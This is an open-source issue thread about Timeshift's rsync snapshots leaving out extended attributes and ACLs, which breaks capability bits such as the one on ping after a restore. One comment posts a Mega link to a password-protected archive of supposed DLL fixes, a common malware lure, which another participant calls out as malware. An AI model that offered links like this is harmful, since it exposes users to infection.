### ISSUE TITLE
Backups not including extended attributes (xattr) or ACLs leading to broken restores.

### ISSUE THREAD

**Issue by erenfro** [linuxmint/timeshift#340]
**Describe the bug**
TimeShift runs rsync with -a, but does not include -X which specifically would be needed to copy xattr's as well which is actually more important than one might think in the case of file-based backups.

rsync -aii --recursive --verbose --delete --force --stats --sparse --delete-excluded --link-dest=... --log-file=... --exclude-from=.../exclude.list --delete-excluded / .../localhost/

This is an example of a command I monitored running to help verify the result. -a omits important arguments for file-based backup which are very relevant for system-level backups, such as -X for xattr and -A for ACLs.

**To Reproduce**
1. Setup Timeshift for Rsync style Snapshot for the system.
2. Create a snapshot.
3. In the timeshift backup directory, .../timeshift/snapshots/DATE/localhost/usr/bin verify the command `ping` has no extended attributes using: `xattr ping` -- Cross reference that with `xattr /usr/bin/ping`

**Expected behavior**
1. ping command should have security.capabilty xattr.

**Screenshots**

**System:**
 - Linux Distribution Name and Version: Linux Mint 22.0
 - Desktop: Cinnamon 6.2.9
 - Application Version: Timeshift 24.06.3

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA

Password: changeme
I put the necessary dlls in the archive

**Comment by erenfro** [comment]
> Password: changeme I put the necessary dlls in the archive

Yeah. No "DLLs" are required, Mega already deleted your share. Malware is not nice.

**Comment by SawkeeReemo** [comment]
I’m seeing this same issue. Is there a fix on the way?

**Comment by erenfro** [comment]
> I’m seeing this same issue. Is there a fix on the way?

I'm not sure, yet. I'm considering looking into it, myself. But I'm personally not familiar with Vala. I hear "good things" about vala. As time permits, I will look into it, but, in the mean time, I'm not recommending Timeshift, I'm actually recommending against it for the time being, and suggesting rsnapshot, which in rsync_short_args, you can set -aAX, and it'll handle these important xattrs and possible ACLs, and you can store it wherver you want, rather than the root of the filesystem as current with timeshift's doing.

**Comment by SawkeeReemo** [comment]
Thanks for the comment! I just gave rsnapshot a test and found the same thing you did. I’m glad there’s an alternative way to do this, but really hope TimeShift gets fixed. Lots of people recommend it pretty regularly, and they are going to be in for a bad surprise if they need to restore.
